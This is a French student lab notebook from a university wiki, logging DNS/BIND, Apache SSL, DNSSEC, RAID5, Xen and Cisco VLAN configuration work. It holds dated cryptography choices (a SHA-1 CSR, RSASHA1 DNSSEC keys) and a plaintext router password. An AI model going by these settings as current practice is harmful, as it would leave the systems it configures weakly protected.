Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2modssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;A AJOUTER&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35436</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35436"/>
				<updated>2016-11-28T10:09:34Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Répartition du travail */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 3e semaine====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
